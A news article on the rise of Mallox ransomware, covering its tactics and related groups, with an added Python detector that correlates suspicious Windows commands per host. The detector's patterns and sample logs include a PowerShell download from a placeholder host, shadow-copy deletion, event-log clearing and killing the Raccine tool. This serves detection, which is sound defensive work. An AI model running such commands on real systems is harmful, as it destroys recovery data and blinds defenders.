Mallox Ransomware Attacks More Often – Up 174% Over the Last Year
Hackers are actively recruiting accomplices in cybercrime forums.
“Mallox, like many other ransomware groups, has a dual extortion strategy: first they steal data, then they encrypt files in the victim’s organization and threaten to release the stolen information in order to force them to pay a ransom,” according to a recent report by cybersecurity experts Lior Rohberger and Shimi Cohen.
According to researchers, Mallox ransomware is closely related to other attackers such as TargetCompany, Tohnichi, Fargo, and the recently emerged Xollam. The Mallox group itself was spotted in June 2021. Among the main targets of hackers are manufacturing companies, professional services firms and wholesale and retail trade.
A distinctive feature of these groups is that they compromise poorly protected MS-SQL servers by brute-forcing passwords, which lets them penetrate their victims' networks. Xollam, on the other hand, differs in that it uses malicious OneNote attachments for initial access.
After a successful intrusion, a PowerShell command is used to download the ransomware from a remote server. The program itself attempts to stop SQL services, delete volume shadow copies, clear system event logs, terminate security-related processes, and bypass Raccine, an anti-ransomware tool. After that, encryption starts, and a ransom note file is left in each directory.
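The behaviours listed above rarely occur together on one host in normal operation, so they can be correlated into a single alert. The following Python example is added here and is not code from the report or its authors; the log format, host names, URL, regex patterns and threshold are all assumptions chosen for illustration, not Mallox indicators.

```python
import re
from collections import defaultdict

# Behaviours named in the article, mapped to patterns for common Windows
# command lines. The patterns are generic assumptions, not Mallox IoCs.
RULES = {
    "ps_download": re.compile(r"powershell.*(downloadstring|downloadfile|invoke-webrequest)", re.I),
    "stop_sql": re.compile(r"\b(net1?|sc)(\.exe)?\s+stop\s+\S*sql", re.I),
    "delete_shadows": re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|shadowcopy\s+delete", re.I),
    "clear_logs": re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\b", re.I),
    "raccine_tamper": re.compile(r"(taskkill|reg(\.exe)?\s+delete|schtasks).*raccine", re.I),
}
THRESHOLD = 3  # distinct behaviours per host before alerting (assumed value)

def parse(line):
    """Split a 'timestamp host command-line' record (constructed format)."""
    ts, host, cmd = line.split(" ", 2)
    return ts, host, cmd

def detect(lines, threshold=THRESHOLD):
    """Return {host: sorted behaviour names} for hosts meeting the threshold."""
    seen = defaultdict(set)
    for line in lines:
        if not line.strip():
            continue
        _, host, cmd = parse(line)
        for name, rx in RULES.items():
            if rx.search(cmd):
                seen[host].add(name)
    return {h: sorted(b) for h, b in seen.items() if len(b) >= threshold}

# Constructed process-creation records; hosts and URL are placeholders.
SAMPLE = """\
2023-07-01T02:10:01Z SQL01 powershell -c Invoke-WebRequest http://example.invalid/a.exe -OutFile a.exe
2023-07-01T02:10:40Z SQL01 net stop MSSQLSERVER /y
2023-07-01T02:10:42Z SQL01 vssadmin.exe delete shadows /all /quiet
2023-07-01T02:10:45Z SQL01 wevtutil cl Security
2023-07-01T02:10:47Z SQL01 taskkill /F /IM Raccine.exe
2023-07-01T09:00:00Z WS07 net stop MSSQL$DEV
2023-07-01T09:05:00Z WS07 powershell Get-Service
""".splitlines()

if __name__ == "__main__":
    for host, hits in detect(SAMPLE).items():
        print(host, hits)
```

A single administrative action, such as the service stop on WS07, stays below the threshold; only the host showing several of the behaviours is reported.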
Experts attribute the increase in ransomware activity to the fact that it still brings huge profits to cybercriminals: in the first six months of 2023 alone, ransomware operators collected at least $449.1 million, according to Chainalysis.
The sharp increase in the number of Mallox attacks is only part of a general trend: the number of ransomware attacks increased by 221% over the year, and 434 incidents were recorded in June 2023 alone. One of the main reasons for these grim statistics is the exploitation of vulnerabilities in MOVEit Transfer by the Clop hackers.
“In recent months, the Mallox group has become more active, and their recruitment attempts could lead to attacks on even more organizations,” experts warn.